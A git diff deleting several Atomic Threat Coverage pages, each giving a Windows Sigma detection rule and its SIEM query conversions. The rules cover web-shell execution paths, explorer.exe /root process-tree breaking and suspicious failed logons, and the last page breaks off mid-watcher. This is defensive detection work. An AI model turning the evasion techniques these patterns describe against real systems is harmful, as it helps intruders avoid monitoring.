-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Execution in Non-Executable Folder
-id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
-status: experimental
-description: Detects a suspicious exection from an uncommon folder
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\$Recycle.bin'
-            - '*\Users\All Users\\*'
-            - '*\Users\Default\\*'
-            - '*\Users\Public\\*'
-            - 'C:\Perflogs\\*'
-            - '*\config\systemprofile\\*'
-            - '*\Windows\Fonts\\*'
-            - '*\Windows\IME\\*'
-            - '*\Windows\addins\\*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\$Recycle.bin" -or $_.message -match "Image.*.*\\Users\\All Users\\.*" -or $_.message -match "Image.*.*\\Users\\Default\\.*" -or $_.message -match "Image.*.*\\Users\\Public\\.*" -or $_.message -match "Image.*C:\\Perflogs\\.*" -or $_.message -match "Image.*.*\\config\\systemprofile\\.*" -or $_.message -match "Image.*.*\\Windows\\Fonts\\.*" -or $_.message -match "Image.*.*\\Windows\\IME\\.*" -or $_.message -match "Image.*.*\\Windows\\addins\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*\\$Recycle.bin OR *\\Users\\All\ Users\\* OR *\\Users\\Default\\* OR *\\Users\\Public\\* OR C\:\\Perflogs\\* OR *\\config\\systemprofile\\* OR *\\Windows\\Fonts\\* OR *\\Windows\\IME\\* OR *\\Windows\\addins\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/3dfd06d2-eaf4-4532-9555-68aca59f57c4 <<EOF
-{
-  "metadata": {
-    "title": "Execution in Non-Executable Folder",
-    "description": "Detects a suspicious exection from an uncommon folder",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*\\\\$Recycle.bin OR *\\\\Users\\\\All\\ Users\\\\* OR *\\\\Users\\\\Default\\\\* OR *\\\\Users\\\\Public\\\\* OR C\\:\\\\Perflogs\\\\* OR *\\\\config\\\\systemprofile\\\\* OR *\\\\Windows\\\\Fonts\\\\* OR *\\\\Windows\\\\IME\\\\* OR *\\\\Windows\\\\addins\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*\\\\$Recycle.bin OR *\\\\Users\\\\All\\ Users\\\\* OR *\\\\Users\\\\Default\\\\* OR *\\\\Users\\\\Public\\\\* OR C\\:\\\\Perflogs\\\\* OR *\\\\config\\\\systemprofile\\\\* OR *\\\\Windows\\\\Fonts\\\\* OR *\\\\Windows\\\\IME\\\\* OR *\\\\Windows\\\\addins\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Execution in Non-Executable Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*\\$Recycle.bin *\\Users\\All Users\\* *\\Users\\Default\\* *\\Users\\Public\\* C\:\\Perflogs\\* *\\config\\systemprofile\\* *\\Windows\\Fonts\\* *\\Windows\\IME\\* *\\Windows\\addins\\*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\$Recycle.bin" OR Image="*\\Users\\All Users\\*" OR Image="*\\Users\\Default\\*" OR Image="*\\Users\\Public\\*" OR Image="C:\\Perflogs\\*" OR Image="*\\config\\systemprofile\\*" OR Image="*\\Windows\\Fonts\\*" OR Image="*\\Windows\\IME\\*" OR Image="*\\Windows\\addins\\*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\$Recycle.bin", "*\\Users\\All Users\\*", "*\\Users\\Default\\*", "*\\Users\\Public\\*", "C:\\Perflogs\\*", "*\\config\\systemprofile\\*", "*\\Windows\\Fonts\\*", "*\\Windows\\IME\\*", "*\\Windows\\addins\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\\$Recycle\.bin|.*.*\Users\All Users\\.*|.*.*\Users\Default\\.*|.*.*\Users\Public\\.*|.*C:\Perflogs\\.*|.*.*\config\systemprofile\\.*|.*.*\Windows\Fonts\\.*|.*.*\Windows\IME\\.*|.*.*\Windows\addins\\.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path_webserver.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path_webserver.md
deleted file mode 100644
index 52d7f67..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_execution_path_webserver.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Execution in Webserver Root Folder       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious program execution in a web service root folder (filter out false positives) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1100: Web Shell](https://attack.mitre.org/techniques/T1100)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Various applications</li><li>Tools that include ping or nslookup command invocations</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1505.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Execution in Webserver Root Folder
-id: 35efb964-e6a5-47ad-bbcd-19661854018d
-status: experimental
-description: Detects a suspicious program execution in a web service root folder (filter out false positives)
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.persistence
-    - attack.t1100
-    - attack.t1505.003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*\wwwroot\\*'
-            - '*\wmpub\\*'
-            - '*\htdocs\\*'
-    filter:
-        Image:
-            - '*bin\\*'
-            - '*\Tools\\*'
-            - '*\SMSComponent\\*'
-        ParentImage:
-            - '*\services.exe'
-    condition: selection and not filter
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Various applications
-    - Tools that include ping or nslookup command invocations
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\wwwroot\\.*" -or $_.message -match "Image.*.*\\wmpub\\.*" -or $_.message -match "Image.*.*\\htdocs\\.*") -and  -not (($_.message -match "Image.*.*bin\\.*" -or $_.message -match "Image.*.*\\Tools\\.*" -or $_.message -match "Image.*.*\\SMSComponent\\.*") -and ($_.message -match "ParentImage.*.*\\services.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\wwwroot\\* OR *\\wmpub\\* OR *\\htdocs\\*) AND (NOT (winlog.event_data.Image.keyword:(*bin\\* OR *\\Tools\\* OR *\\SMSComponent\\*) AND winlog.event_data.ParentImage.keyword:(*\\services.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/35efb964-e6a5-47ad-bbcd-19661854018d <<EOF
-{
-  "metadata": {
-    "title": "Execution in Webserver Root Folder",
-    "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)",
-    "tags": [
-      "attack.persistence",
-      "attack.t1100",
-      "attack.t1505.003"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\wwwroot\\\\* OR *\\\\wmpub\\\\* OR *\\\\htdocs\\\\*) AND (NOT (winlog.event_data.Image.keyword:(*bin\\\\* OR *\\\\Tools\\\\* OR *\\\\SMSComponent\\\\*) AND winlog.event_data.ParentImage.keyword:(*\\\\services.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\wwwroot\\\\* OR *\\\\wmpub\\\\* OR *\\\\htdocs\\\\*) AND (NOT (winlog.event_data.Image.keyword:(*bin\\\\* OR *\\\\Tools\\\\* OR *\\\\SMSComponent\\\\*) AND winlog.event_data.ParentImage.keyword:(*\\\\services.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Execution in Webserver Root Folder'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\wwwroot\\* *\\wmpub\\* *\\htdocs\\*) AND (NOT (Image.keyword:(*bin\\* *\\Tools\\* *\\SMSComponent\\*) AND ParentImage.keyword:(*\\services.exe))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\wwwroot\\*" OR Image="*\\wmpub\\*" OR Image="*\\htdocs\\*") NOT ((Image="*bin\\*" OR Image="*\\Tools\\*" OR Image="*\\SMSComponent\\*") (ParentImage="*\\services.exe"))) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\wwwroot\\*", "*\\wmpub\\*", "*\\htdocs\\*"]  -(Image IN ["*bin\\*", "*\\Tools\\*", "*\\SMSComponent\\*"] ParentImage IN ["*\\services.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\wwwroot\\.*|.*.*\wmpub\\.*|.*.*\htdocs\\.*))(?=.*(?!.*(?:.*(?=.*(?:.*.*bin\\.*|.*.*\Tools\\.*|.*.*\SMSComponent\\.*))(?=.*(?:.*.*\services\.exe))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_explorer_break_proctree.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_explorer_break_proctree.md
deleted file mode 100644
index 27adbb8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_explorer_break_proctree.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Explorer Root Flag Process Tree Break       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown how many legitimate software products use that method</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/CyberRaiju/status/1273597319322058752](https://twitter.com/CyberRaiju/status/1273597319322058752)</li><li>[https://twitter.com/bohops/status/1276357235954909188?s=12](https://twitter.com/bohops/status/1276357235954909188?s=12)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Explorer Root Flag Process Tree Break
-id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605
-description: Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer
-status: experimental
-references:
-    - https://twitter.com/CyberRaiju/status/1273597319322058752
-    - https://twitter.com/bohops/status/1276357235954909188?s=12
-author: Florian Roth
-date: 2019/06/29
-tags:
-    - attack.defense_evasion
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all: 
-            - 'explorer.exe'
-            - ' /root,'
-    condition: selection
-falsepositives:
-    - Unknown how many legitimate software products use that method
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*explorer.exe.*" -and $_.message -match "CommandLine.*.* /root,.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*explorer.exe* AND winlog.event_data.CommandLine.keyword:*\ \/root,*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/949f1ffb-6e85-4f00-ae1e-c3c5b190d605 <<EOF
-{
-  "metadata": {
-    "title": "Explorer Root Flag Process Tree Break",
-    "description": "Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer",
-    "tags": [
-      "attack.defense_evasion"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*explorer.exe* AND winlog.event_data.CommandLine.keyword:*\\ \\/root,*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*explorer.exe* AND winlog.event_data.CommandLine.keyword:*\\ \\/root,*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Explorer Root Flag Process Tree Break'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*explorer.exe* AND CommandLine.keyword:* \/root,*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*explorer.exe*" CommandLine="* /root,*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*explorer.exe*" CommandLine="* /root,*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*explorer\.exe.*)(?=.*.* /root,.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_reasons.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_reasons.md
deleted file mode 100644
index 357a670..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_reasons.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Account Tampering - Suspicious Failed Logon Reasons       |
-|:-------------------------|:------------------|
-| **Description**          | This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>User using a disabled account</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1101431884540710913](https://twitter.com/SBousseaden/status/1101431884540710913)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Account Tampering - Suspicious Failed Logon Reasons
-id: 9eb99343-d336-4020-a3cd-67f3819e68ee
-description: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow
-    restricted.
-author: Florian Roth
-date: 2017/02/19
-modified: 2019/03/01
-references:
-    - https://twitter.com/SBousseaden/status/1101431884540710913
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1078
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 4625
-            - 4776
-        Status:
-            - '0xC0000072'  # User logon to account disabled by administrator
-            - '0xC000006F'  # User logon outside authorized hours
-            - '0xC0000070'  # User logon from unauthorized workstation
-            - '0xC0000413'  # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine
-            - '0xC000018C'  # The logon request failed because the trust relationship between the primary domain and the trusted domain failed
-            - '0xC000015B'  # The user has not been granted the requested logon type (aka logon right) at this machine
-    condition: selection
-falsepositives:
-    - User using a disabled account
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4625" -or $_.ID -eq "4776") -and ($_.message -match "0xC0000072" -or $_.message -match "0xC000006F" -or $_.message -match "0xC0000070" -or $_.message -match "0xC0000413" -or $_.message -match "0xC000018C" -or $_.message -match "0xC000015B")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4625" OR "4776") AND winlog.event_data.Status:("0xC0000072" OR "0xC000006F" OR "0xC0000070" OR "0xC0000413" OR "0xC000018C" OR "0xC000015B"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9eb99343-d336-4020-a3cd-67f3819e68ee <<EOF
-{
-  "metadata": {
-    "title": "Account Tampering - Suspicious Failed Logon Reasons",
-    "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1078"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4625\" OR \"4776\") AND winlog.event_data.Status:(\"0xC0000072\" OR \"0xC000006F\" OR \"0xC0000070\" OR \"0xC0000413\" OR \"0xC000018C\" OR \"0xC000015B\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4625\" OR \"4776\") AND winlog.event_data.Status:(\"0xC0000072\" OR \"0xC000006F\" OR \"0xC0000070\" OR \"0xC0000413\" OR \"0xC000018C\" OR \"0xC000015B\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Account Tampering - Suspicious Failed Logon Reasons'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4625" "4776") AND Status:("0xC0000072" "0xC000006F" "0xC0000070" "0xC0000413" "0xC000018C" "0xC000015B"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4625" OR EventCode="4776") (Status="0xC0000072" OR Status="0xC000006F" OR Status="0xC0000070" OR Status="0xC0000413" OR Status="0xC000018C" OR Status="0xC000015B"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4625", "4776"] Status IN ["0xC0000072", "0xC000006F", "0xC0000070", "0xC0000413", "0xC000018C", "0xC000015B"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4625|.*4776))(?=.*(?:.*0xC0000072|.*0xC000006F|.*0xC0000070|.*0xC0000413|.*0xC000018C|.*0xC000015B)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_source.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_source.md
deleted file mode 100644
index dd1a9cc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logon_source.md
+++ /dev/null
@@ -1,205 +0,0 @@
-| Title                    | Failed Logon From Public IP       |
-|:-------------------------|:------------------|
-| **Description**          | A login from a public IP can indicate a misconfigured firewall or network boundary. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1078: Valid Accounts](https://attack.mitre.org/techniques/T1078)</li><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li><li>[T1133: External Remote Services](https://attack.mitre.org/techniques/T1133)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate logon attempts over the internet</li><li>IPv4-to-IPv6 mapped IPs</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | NVISO |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Failed Logon From Public IP
-id: f88e112a-21aa-44bd-9b01-6ee2a2bbbed1
-description: A login from a public IP can indicate a misconfigured firewall or network boundary.
-author: NVISO
-date: 2020/05/06
-tags:
-    - attack.initial_access
-    - attack.persistence
-    - attack.t1078
-    - attack.t1190
-    - attack.t1133
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4625
-    unknown:
-        IpAddress|contains: '-'
-    privatev4:
-        IpAddress|startswith:
-            - '10.' #10.0.0.0/8
-            - '192.168.' #192.168.0.0/16
-            - '172.16.' #172.16.0.0/12
-            - '172.17.'
-            - '172.18.'
-            - '172.19.'
-            - '172.20.'
-            - '172.21.'
-            - '172.22.'
-            - '172.23.'
-            - '172.24.'
-            - '172.25.'
-            - '172.26.'
-            - '172.27.'
-            - '172.28.'
-            - '172.29.'
-            - '172.30.'
-            - '172.31.'
-            - '127.' #127.0.0.0/8
-            - '169.254.' #169.254.0.0/16
-    privatev6:
-        - IpAddress: '::1' #loopback 
-        - IpAddress|startswith:
-            - 'fe80::' #link-local
-            - 'fc00::' #unique local
-    condition: selection and not (unknown or privatev4 or privatev6)
-falsepositives:
-    - Legitimate logon attempts over the internet
-    - IPv4-to-IPv6 mapped IPs
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4625" -and  -not ((($_.message -match "IpAddress.*.*-.*" -or ($_.message -match "IpAddress.*10..*" -or $_.message -match "IpAddress.*192.168..*" -or $_.message -match "IpAddress.*172.16..*" -or $_.message -match "IpAddress.*172.17..*" -or $_.message -match "IpAddress.*172.18..*" -or $_.message -match "IpAddress.*172.19..*" -or $_.message -match "IpAddress.*172.20..*" -or $_.message -match "IpAddress.*172.21..*" -or $_.message -match "IpAddress.*172.22..*" -or $_.message -match "IpAddress.*172.23..*" -or $_.message -match "IpAddress.*172.24..*" -or $_.message -match "IpAddress.*172.25..*" -or $_.message -match "IpAddress.*172.26..*" -or $_.message -match "IpAddress.*172.27..*" -or $_.message -match "IpAddress.*172.28..*" -or $_.message -match "IpAddress.*172.29..*" -or $_.message -match "IpAddress.*172.30..*" -or $_.message -match "IpAddress.*172.31..*" -or $_.message -match "IpAddress.*127..*" -or $_.message -match "IpAddress.*169.254..*") -or $_.message -match "IpAddress.*::1" -or ($_.message -match "IpAddress.*fe80::.*" -or $_.message -match "IpAddress.*fc00::.*"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4625" AND (NOT ((winlog.channel:"Security" AND (winlog.event_data.IpAddress.keyword:*\-* OR winlog.event_data.IpAddress.keyword:(10.* OR 192.168.* OR 172.16.* OR 172.17.* OR 172.18.* OR 172.19.* OR 172.20.* OR 172.21.* OR 172.22.* OR 172.23.* OR 172.24.* OR 172.25.* OR 172.26.* OR 172.27.* OR 172.28.* OR 172.29.* OR 172.30.* OR 172.31.* OR 127.* OR 169.254.*) OR winlog.event_data.IpAddress:"\:\:1" OR winlog.event_data.IpAddress.keyword:(fe80\:\:* OR fc00\:\:*))))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f88e112a-21aa-44bd-9b01-6ee2a2bbbed1 <<EOF
-{
-  "metadata": {
-    "title": "Failed Logon From Public IP",
-    "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.",
-    "tags": [
-      "attack.initial_access",
-      "attack.persistence",
-      "attack.t1078",
-      "attack.t1190",
-      "attack.t1133"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4625\" AND (NOT ((winlog.channel:\"Security\" AND (winlog.event_data.IpAddress.keyword:*\\-* OR winlog.event_data.IpAddress.keyword:(10.* OR 192.168.* OR 172.16.* OR 172.17.* OR 172.18.* OR 172.19.* OR 172.20.* OR 172.21.* OR 172.22.* OR 172.23.* OR 172.24.* OR 172.25.* OR 172.26.* OR 172.27.* OR 172.28.* OR 172.29.* OR 172.30.* OR 172.31.* OR 127.* OR 169.254.*) OR winlog.event_data.IpAddress:\"\\:\\:1\" OR winlog.event_data.IpAddress.keyword:(fe80\\:\\:* OR fc00\\:\\:*))))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
